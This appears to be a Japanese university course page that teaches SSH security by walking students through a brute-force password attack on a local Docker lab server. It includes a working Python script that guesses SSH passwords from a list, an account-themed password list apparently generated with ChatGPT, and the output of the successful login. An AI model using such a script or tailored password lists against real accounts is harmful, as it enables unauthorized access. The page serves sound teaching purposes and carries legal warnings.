コンテンツにスキップ

サイバー攻撃

課題が終わり余裕がある方に向けて、ここでは発展的な内容を取り扱います。
SSH接続の応用先に興味のある方は一度ご覧ください。
課題が終わっていない方は、課題のページに戻ってください。

社会のIT化とサイバー攻撃

現代においてICT(Information and Communication Technology)は生活に欠かせないものになっています。 こうして授業をする中でも、zoomを用いたりGoogle検索をしたりメールやLINEでメッセージをやりとりしたりできます。 今回の演習によって、遠くのコンピュータを操ることもできるようになりました。

ここで、犯罪者の視点から現代の状況を考えてみましょう。
例えば、あなたに恨みがあって、あなたを妨害しようとしている状況を想像してください。
現代の状況はその人にとって有利でしょうか、不利でしょうか?
ICTが全くない状況を想像した上で現代と比較すれば、答えは明白かと思われます。

サイバー攻撃に関するニュースは毎日のように出ているので、検索してみてください。
気になるニュースを見つけたら、攻撃手法の詳細・ハッカー集団のバックにいる組織・サイバー攻撃の動機など、いろいろと調べてみてください。

パスワード認証SSHサーバーに対するサイバー攻撃

今回は、東京大学の地球惑星物理学科に所属する「chibutsu」さんへサイバー攻撃をしてみたいと思います。

パスワード認証が採用されているログインサーバー「dover」を狙うことに決めました。

それでは、サイバー攻撃の流れを見ていきましょう。
これを通して、公開鍵認証の大切さが伝われば幸いです。

実際に取り組めるようにしているので、余裕のある方はハッカー(正確にはクラッカー)になったつもりでやってみてください。Codespaceで行うのが楽かなと思います。
かなり都合の良い展開が続きますが、それは上手くいくようにわざとセットしたからです。
ここでのシナリオはシンプルなものであり、現実はもっと複雑で高度な攻撃が行われています。

Warning

許可無く他人のサーバーに以下の内容を行うことは、決して許されません。
サイバーセキュリティ基本法・不正アクセス禁止法・電子署名法などに触れる恐れがあります。
また、電子計算機使用詐欺罪・電子計算機損害等業務妨害罪などに該当する可能性もあります。
このことをよく理解した上で、続きをお楽しみください。

ログインサーバー(559で言うところのdover)へ遠隔ログインを試みます。
この際、あなたはOSINT等によりアカウント名「chibutsu」が存在することは把握できたものの、本人ではないためパスワードは分かりません。 つまり、これから不正ログインをしようとしているわけです。
どのようにパスワードを入手しますか? まずは自分で考えてみてください。

Note

今回は計算機演習の授業なので、コンピュータ内で完結する手法の1つを紹介します。
心理学的な攻撃が気になる方は、「ソーシャルエンジニアリング」で検索してみてください。

今回は、dockerコンテナを用いて仮想的なログインサーバーを作り、それを攻撃します。
自分のPCにdockerをインストールするか、Codespaceを使ってください。559のMac miniにはインストールされていません。

以下、Codespaceで行う場合の手順です。
まずは、/workspaces/ubuntu-22.04/remote_accessに移動して、docker_setup.shを実行してください。少し時間がかかります。 

$ cd /workspaces/ubuntu-22.04/remote_access

# 権限を要求された場合
$ chmod 700 docker_setup.sh
$ ./docker_setup.sh
上手くいけば、以下のようなメッセージが表示されるはずです。 
dockerコンテナの準備が完了しました。
'ssh ユーザー名@localhost -p 22222'でSSHログインができます。

試しにSSHしてみましょう。パスワードは今のところ分からないはずなので、適当に入力してください。 

$ ssh chibutsu@localhost -p 22222
The authenticity of host '[localhost]:22222 ([::1]:22222)' can't be established.
ECDSA key fingerprint is SHA256:7CsZMUdMUJCx9qX89ZxRaUj2s8u8MBnuB2NUFZK+W4A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[localhost]:22222' (ECDSA) to the list of known hosts.
chibutsu@localhost's password: 
Permission denied, please try again.
chibutsu@localhost's password: 
Permission denied, please try again.
chibutsu@localhost's password: 
chibutsu@localhost: Permission denied (publickey,password).
当たり前ですが、パスワードが分からないのでログインできません。

今回はブルートフォース攻撃(総当たり攻撃)をやってみようと思います。あり得そうなパスワードのリストを片っ端から試す攻撃手法です。

調査の結果、「chibutsu」さんは東京大学の地球惑星物理学科に所属する学生であることが分かりました。 主に固体地球・大気海洋・宇宙惑星が好きな学生が所属する機関らしいです。
この情報を元に、ChatGPTにパスワードリストを作成してもらい、passwords.txtに保存しました。このテキストファイルを開いて、中身を見てみてください。地物っぽい単語が並んでいると思います。

Note

ChatGPTの有効な活用の仕方については、「プロンプトエンジニアリング」で検索してみてください。
書籍も数多く出版されていますが、ピンキリです。

それでは、このパスワードリストを用いてSSHログインを試しましょう。
シェルスクリプトで攻撃コードを組むのは地味に大変なので、今回はPythonで組みました。
理解できなくても良いので、bruteforce_ssh.pyを眺めてみてください。Pythonの授業が終わる頃には、何をしているかなんとなく分かるようになっているはずです。 

# bruteforce_ssh.py

import paramiko 
import time
import sys


passwords_path = "passwords.txt" # パスワードリストの場所

# ssh ユーザー名@localhost -p 22222
HOST = "localhost" # SSH接続先
PORT = 22222 # SSH接続のためのポート番号。今回は22222。
USER = "chibutsu" # ユーザー名

# パスワードリストからパスワードを読み込んでSSH接続を試みる。
# 接続が成功したらプログラムを終了させる。
# 失敗したら次のパスワードを試す。
with open(passwords_path, "r") as file:

    for PASSWORD in file:

        # 改行コードを取り除く
        PASSWORD = PASSWORD.replace("\n", "")

        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
            ssh.connect(hostname=HOST, port=PORT, username=USER, password=PASSWORD)
            print()
            print("SUCCESS!")
            print(f"username : {USER}")
            print(f"password : {PASSWORD}")

            sys.exit()
        except paramiko.AuthenticationException:
            print(f"{PASSWORD} is not correct")
        finally:
            ssh.close()

Note

paramikoというライブラリが必要です。pip install paramikoでインストールしてください。

このコードを実行した結果、パスワードが奇跡的に判明しました。 

$ python bruteforce_ssh.py 
earth is not correct
planet is not correct
physics is not correct
...
tornado is not correct
storm is not correct

SUCCESS!
username : chibutsu
password : aurora

早速パスワードを用いて、SSHログインを試みます。 

$ ssh chibutsu@localhost -p 22222
chibutsu@localhost's password:  # "aurora"と入力
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 6.5.0-1017-azure x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
chibutsu@960522125acf:~$

これで不正ログイン完了です。「chibutsu」さんになりすますことができました。
「chibutsu」を自分のアカウント名に置き換えて考えれば、この状況の深刻さが分かっていただけるかと思います。

ここからは権限昇格を狙う(管理者権限を取得する)・バックドアを仕込む(次から簡単にログインできるようにする)・機密ファイルを転送する等がありますが、これ以上は行いません。

ここまでお付き合いいただきありがとうございました。

改めて、いかなる理由があろうともサイバー攻撃は犯罪です。興味本位で行ってはいけません。

公開鍵認証って大事なんだな、と思っていただけた方は是非とも設定してください。
SSHのページ

サイバーセキュリティに興味を持ってくれた方へ

実践することをメインにした書籍を中心に、何冊か紹介します。 全部読んだことがあるわけではありませんが、きっと楽しめる本です。
帰り際に書籍部や図書館で見てみてはいかかでしょうか?

  • ハッキング・ラボのつくりかた 完全版 仮想環境におけるハッカー体験学習
  • 体系的に学ぶ安全なWebアプリケーションの作り方 第2版 脆弱性が生まれる原理と対策の実践
  • 実践 bashによるサイバーセキュリティ対策 セキュリティ技術者のためのシェルスクリプト活用術
  • セキュリティエンジニアのための機械学習 AI技術によるサイバーセキュリティ対策入門
  • 詳解セキュリティコンテスト CTFで学ぶ脆弱性攻略の技術
  • ソーシャル・エンジニアリング 最大の弱点“人間”をハッカーの魔の手から守るには